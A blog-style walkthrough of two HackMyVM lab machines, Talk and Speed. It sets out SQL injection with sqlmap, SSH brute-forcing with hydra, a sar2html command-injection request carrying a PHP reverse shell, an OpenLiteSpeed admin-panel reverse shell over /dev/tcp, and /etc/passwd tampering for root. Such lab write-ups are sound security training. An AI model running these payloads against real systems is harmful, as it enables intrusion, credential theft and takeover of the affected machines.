I’ve done a couple more HackMyVM boxes: Talk and Speed. Talk is Easy rated, Speed is Medium.

Talk

Talk was a webapp called chatME which we can find here and if we download it then it doesn’t appear to have any input sanitation so is probably open to SQLi.

┌──(root💀kali)-[/opt/hackmyvm/talk]
└─# sqlmap -r request --level=2 --risk=2 --batch
# etc
[21:13:27] [INFO] POST parameter 'id' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (2) values? [Y/n] Y
[21:13:27] [INFO] testing 'Generic inline queries'
[21:13:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:13:27] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:13:27] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[21:13:27] [INFO] checking if the injection point on POST parameter 'id' is a false positive
POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 549 HTTP(s) requests:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: msg=id;id&id=1' RLIKE (SELECT (CASE WHEN (4603=4603) THEN 1 ELSE 0x28 END)) AND 'UTLh'='UTLh
---
[21:13:27] [INFO] the back-end DBMS is MySQL
/usr/lib/python3/dist-packages/pkg_resources/__init__.py:116: PkgResourcesDeprecationWarning: Unknown is an invalid version and will not be supported in a future release
  warnings.warn(
web application technology: Nginx 1.14.2
back-end DBMS: MySQL Unknown (MariaDB fork)
[21:13:27] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.10.66'

[*] ending @ 21:13:27 /2022-01-22/

So, yes. I carry on with sqlmap:

Database: chat
Table: user
[5 entries]
+--------+-----------------+-------------+-----------------+----------+
| userid | email           | phone       | password        | username |
+--------+-----------------+-------------+-----------------+----------+
| 5      | david@david.com | 11          | adrianthebest   | david    |
| 4      | jerry@jerry.com | 111         | thatsmynonapass | jerry    |
| 2      | nona@nona.com   | 1111        | myfriendtom     | nona     |
| 1      | pao@yahoo.com   | 09123123123 | pao             | pao      |
| 3      | tina@tina.com   | 11111       | davidwhatpass   | tina     |
+--------+-----------------+-------------+-----------------+----------+

[21:14:44] [INFO] table 'chat.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/10.10.10.66/dump/chat/user.csv'
[21:14:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.10.66'

[*] ending @ 21:14:44 /2022-01-22/

Privesc etc

┌──(root💀kali)-[/opt/hackmyvm/talk]
└─# hydra -L users -P pass ssh://10.10.10.66
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-22 21:16:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 30 login tries (l:6/p:5), ~2 tries per task
[DATA] attacking ssh://10.10.10.66:22/
[22][ssh] host: 10.10.10.66   login: nona   password: thatsmynonapass
[22][ssh] host: 10.10.10.66   login: david   password: davidwhatpass
[22][ssh] host: 10.10.10.66   login: jerry   password: myfriendtom
[22][ssh] host: 10.10.10.66   login: adrian   password: adrianthebest
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-01-22 21:16:57
                                                                                                                                                                    
┌──(root💀kali)-[/opt/hackmyvm/talk]
└─# ssh adrian@10.10.10.66
adrian@10.10.10.66s password: 
Linux talk 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
adrian@talk:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for adrian: 
Sorry, user adrian may not run sudo on talk.
adrian@talk:~$ su jerry
Password: 
jerry@talk:/home/adrian$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for jerry: 
Sorry, user jerry may not run sudo on talk.
jerry@talk:/home/adrian$ su david
Password: 
david@talk:/home/adrian$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for david: 
Sorry, user david may not run sudo on talk.
david@talk:/home/adrian$ su nona
Password: 
nona@talk:~$ sudo -l
Matching Defaults entries for nona on talk:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nona may run the following commands on talk:
    (ALL : ALL) NOPASSWD: /usr/bin/lynx
nona@talk:/home/adrian$ sudo -u root /usr/bin/lynx -dump /root/.ssh/id_rsa > /tmp/id_rsa
nona@talk:/home/adrian$ cd /tmp
nona@talk:/tmp$ chmod 600 id_rsa 
nona@talk:/tmp$ ssh -i id_rsa root@localhost
The authenticity of host 'localhost (::1)' cant be established.
ECDSA key fingerprint is SHA256:QnewK0l6AphbD9vYMwFTNEGQhVfJ8KlSn1BGwWO1D/Q.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
Linux talk 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb 18 04:34:23 2021
root@talk:~#

Speed

Here we had a few extra ports:

┌──(root💀kali)-[/opt/hackmyvm/speed]
└─# nmap -T4 -p22,80,7080,8088 -A 10.10.10.67 -oA nmap/tcp_detail
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-22 21:26 EST
Nmap scan report for 10.10.10.67
Host is up (0.00030s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fe:07:9a:67:7f:8a:63:a7:48:46:46:bb:78:83:4e:d5 (RSA)
|   256 5e:9b:35:e4:82:5f:eb:01:9b:6a:7b:cc:5b:16:00:4f (ECDSA)
|_  256 67:85:3b:a2:fb:3b:d0:d0:6b:45:a0:ae:2d:ac:1b:e9 (ED25519)
80/tcp   open  http     nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesnt have a title (text/html; charset=UTF-8).
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
7080/tcp open  ssl/http LiteSpeed httpd
|_ssl-date: TLS randomness does not represent time
|_http-title: Did not follow redirect to https://10.10.10.67:7080/login.php
| ssl-cert: Subject: commonName=speed/organizationName=webadmin/countryName=US
| Not valid before: 2021-02-17T08:51:38
|_Not valid after:  2023-02-17T08:51:38
|_http-server-header: LiteSpeed
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
8088/tcp open  http     LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Welcome
MAC Address: 08:00:27:48:3A:28 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.30 ms 10.10.10.67

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.38 seconds

On the main website we had sar2html version 3.2.2 which famously has a command injection exploit in version 3.2.1. On the project github page, it describes the release of 3.2.2:

sar2html supports Ubuntu 20 now.
minor fixes

Um, ok. Does the command injection still work? Actually, yes:

GET /index.php?plot=;php+-r+'$sock%3dfsockopen("10.10.10.2",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1
Host: 10.10.10.67
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=2gk0g046qkm2crb2pi8p9jeqa7; miindex2=1
Upgrade-Insecure-Requests: 1

and

┌──(root💀kali)-[/opt/hackmyvm/speed]
└─# nc -nvlp 1234                                                
listening on [any] 1234 ...
connect to [10.10.10.2] from (UNKNOWN) [10.10.10.67] 53314
/bin/sh: 0: cant access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@speed:~/html$ sudo -l
sudo -l
bash: sudo: command not found
www-data@speed:~/html$

With this, we can find some credentials for the OpenLiteSpeed 1.5.12 running on Port 7080.

www-data@speed:/usr/local/lsws$ ls -lash
ls -lash
total 132K
4.0K drwxr-xr-x 22 root   root    4.0K Feb 17  2021 .
4.0K drwxr-xr-x 11 root   root    4.0K Feb 17  2021 ..
4.0K drwxr-xr-x  6 root   root    4.0K Feb 17  2021 Example
 36K -rw-r--r--  1 root   root     35K Feb 17  2021 GPL.txt
4.0K -rw-r--r--  1 root   root       7 Feb 17  2021 VERSION
4.0K drwxr-xr-x  4 root   root    4.0K Feb 17  2021 add-ons
4.0K drwxr-xr-x  9 root   root    4.0K Feb 17  2021 admin
4.0K -rwxrwxrwx  1 root   root      41 Feb 17  2021 adminpasswd
4.0K drwxr-xr-x  2 nobody nogroup 4.0K Jan 23 03:55 autoupdate
4.0K drwxr-xr-x  2 root   root    4.0K Feb 17  2021 backup
4.0K drwxr-xr-x  2 root   root    4.0K Feb 17  2021 bin
4.0K drwxr-xr-x  2 nobody nogroup 4.0K Feb 17  2021 cachedata
4.0K drwx--x---  2 nobody nogroup 4.0K Jan 22 21:24 cgid
4.0K drwxr-x---  5 lsadm  nogroup 4.0K Feb 17  2021 conf
4.0K drwxr-xr-x  6 root   root    4.0K Feb 17  2021 docs
4.0K drwxr-xr-x  2 root   root    4.0K Feb 17  2021 fcgi-bin
4.0K drwxr-xr-x  2 root   root    4.0K Feb 17  2021 gdata
4.0K drwxr-xr-x  2 root   root    4.0K Feb 17  2021 lib
4.0K drwxr-xr-x  2 root   root    4.0K Jan 22 21:24 logs
4.0K drwxr-xr-x  2 root   root    4.0K Feb 17  2021 lsrecaptcha
4.0K drwxr-xr-x  2 root   root    4.0K Feb 17  2021 modules
4.0K drwxr-xr-x  2 root   root    4.0K Feb 17  2021 php
4.0K drwx------  2 lsadm  lsadm   4.0K Jan 23 03:55 phpbuild
4.0K drwxr-xr-x  3 root   root    4.0K Feb 17  2021 share
4.0K drwxr-xr-x  3 nobody nogroup 4.0K Feb 17  2021 tmp
www-data@speed:/usr/local/lsws$ cat adminpasswd
cat adminpasswd
WebAdmin user/password is admin/MjE0MGU2
www-data@speed:/usr/local/lsws$

Now, we have OpenLiteSpeed 1.5.12. There is an exploit described here for version 1.7.8, but it also works for our version. Using the webapp, we can go to Server Configuration > External App and edit the (only) entry which is for LiteSpeed SAPI App. In command we enter our shell with this syntax:

fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/10.10.10.2/1234 0>&1'

and in Run as User and Run as Group we put root. This gets us a shell with GID of 0, but not UID. We also need to save the changes and run a ‘graceful’ restart to fire the shell.

┌──(root💀kali)-[/opt/hackmyvm/speed]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.10.2] from (UNKNOWN) [10.10.10.67] 53350
bash: cannot set terminal process group (26708): Inappropriate ioctl for device
bash: no job control in this shell
nobody@speed:/usr/bin$ id
id
uid=65534(nobody) gid=0(root) groups=0(root)

But with that, we can overwrite /etc/passwd:

id
uid=65534(nobody) gid=0(root) groups=0(root)
nobody@speed:/usr/bin$ echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
nobody@speed:/usr/bin$ su root2
su root2
Password: mrcake
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -lash
total 32K
4.0K drwx------  3 root root 4.0K Feb 17  2021 .
4.0K drwxr-xr-x 18 root root 4.0K Feb 17  2021 ..
4.0K -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
4.0K -rwx--x--x  1 root root 1.9K Feb 17  2021 flag.sh
4.0K drwxr-xr-x  3 root root 4.0K Feb 17  2021 .local
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-------  1 root root   18 Feb 17  2021 root.txt
4.0K -rw-r--r--  1 root root   66 Feb 17  2021 .selected_editor

And that’s that.